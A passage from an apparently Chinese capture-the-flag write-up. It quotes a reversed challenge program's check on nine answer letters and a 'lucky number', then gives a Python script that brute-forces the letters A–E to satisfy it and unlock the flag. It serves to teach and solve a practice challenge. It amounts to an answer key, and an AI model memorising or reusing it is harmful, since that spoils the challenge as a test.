if (a[1] * 33 + a[2] + a[3] * 255 + a[4] * 5 - a[5] * 44) + a[6] * 23 + a[7] + a[8] - a[0] == 18086 and a[1] * 123121 + a[2] * 456 + l * 4421 + a[4] * 789 + a[6] * 111 + l * 222 == 10718690 and a[3] * 114514 + a[5] * 1919810 + l * 233 + a[7] * 23333 + a[0] * 66666 == 142285032 and a[1] * 2 + a[2] * 223 + l * 4 + a[4] * 2123 + a[6] * 212 + l * 22 - a[8] == 179865 and (a[1] * 3 + a[2] * 3 + a[0] * 3 + l * 3 - a[8] * 3) + a[7] * 2 == 1996 and ((((a[1] - a[2]) + a[3] - a[4]) + a[5] + a[6] * 89 + a[7] - a[8]) + a[0] * 89 - l) * 22 == 247258 and ((a[1] + 90 * a[2] - a[3]) + a[4] * a[5] * a[6] + a[7] + a[8] + 90 * a[0]) * 245 + l * 2 == 72365152 and (a[1] + a[5] + a[6] + a[7] + a[8] + a[0]) * 35 + l * 3 == 15563 and a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4 + l == 0x181C4785E36ACE6 and ((a[1] + a[2] * 345 - a[3]) + a[4] * 24 + a[5] * 856 - a[6] - a[7]) + a[8] * 1212 + a[0] + l * 33 == 182318:

a是用户输入的答案字母。不过可以注意到,a与幸运数字满足一个关系:

1
l = 0x181C4785E36ACE6-(a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4)

因此,a固定时l固定。因为我不知道这个题目的答案,也懒得去搜索,因此直接暴力枚举a的答案就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
a = [ord('B'), ord('C'), ord('B'), ord('C'), ord('E'), ord('C'), ord('E'), ord('D'), ord('B')]
alp = ['A','B','C','D','E']

# l = 0x181C4785E36ACE6-(a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4)
# if (a[1] * 33 + a[2] + a[3] * 255 + a[4] * 5 - a[5] * 44) + a[6] * 23 + a[7] + a[8] - a[0] == 18086 and a[1] * 123121 + a[2] * 456 + l * 4421 + a[4] * 789 + a[6] * 111 + l * 222 == 10718690 and a[3] * 114514 + a[5] * 1919810 + l * 233 + a[7] * 23333 + a[0] * 66666 == 142285032 and a[1] * 2 + a[2] * 223 + l * 4 + a[4] * 2123 + a[6] * 212 + l * 22 - a[8] == 179865 and (a[1] * 3 + a[2] * 3 + a[0] * 3 + l * 3 - a[8] * 3) + a[7] * 2 == 1996 and ((((a[1] - a[2]) + a[3] - a[4]) + a[5] + a[6] * 89 + a[7] - a[8]) + a[0] * 89 - l) * 22 == 247258 and ((a[1] + 90 * a[2] - a[3]) + a[4] * a[5] * a[6] + a[7] + a[8] + 90 * a[0]) * 245 + l * 2 == 72365152 and (a[1] + a[5] + a[6] + a[7] + a[8] + a[0]) * 35 + l * 3 == 15563 and a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4 + l == 0x181C4785E36ACE6 and ((a[1] + a[2] * 345 - a[3]) + a[4] * 24 + a[5] * 856 - a[6] - a[7]) + a[8] * 1212 + a[0] + l * 33 == 182318:
#     print("Yes")

def check(b):
    a = []
    for i in b:
        a.append(ord(i))
    l = 0x181C4785E36ACE6-(a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4)
    if (a[1] * 33 + a[2] + a[3] * 255 + a[4] * 5 - a[5] * 44) + a[6] * 23 + a[7] + a[8] - a[0] == 18086 and a[1] * 123121 + a[2] * 456 + l * 4421 + a[4] * 789 + a[6] * 111 + l * 222 == 10718690 and a[3] * 114514 + a[5] * 1919810 + l * 233 + a[7] * 23333 + a[0] * 66666 == 142285032 and a[1] * 2 + a[2] * 223 + l * 4 + a[4] * 2123 + a[6] * 212 + l * 22 - a[8] == 179865 and (a[1] * 3 + a[2] * 3 + a[0] * 3 + l * 3 - a[8] * 3) + a[7] * 2 == 1996 and ((((a[1] - a[2]) + a[3] - a[4]) + a[5] + a[6] * 89 + a[7] - a[8]) + a[0] * 89 - l) * 22 == 247258 and ((a[1] + 90 * a[2] - a[3]) + a[4] * a[5] * a[6] + a[7] + a[8] + 90 * a[0]) * 245 + l * 2 == 72365152 and (a[1] + a[5] + a[6] + a[7] + a[8] + a[0]) * 35 + l * 3 == 15563 and a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4 + l == 0x181C4785E36ACE6 and ((a[1] + a[2] * 345 - a[3]) + a[4] * 24 + a[5] * 856 - a[6] - a[7]) + a[8] * 1212 + a[0] + l * 33 == 182318:
        print(l)
        return True
    return False

for y in alp:
    for b in alp:
        for c in alp:
            for d in alp:
                for e in alp:
                    for f in alp:
                        for g in alp:
                            for h in alp:
                                for i in alp:
                                    a = [y,b,c,d,e,f,g,h,i]
                                    if check(a):
                                        print(a)

alt text

获得了幸运数字和所有题目的答案,我们就可以用最开始的exe文件获取flag了。

alt text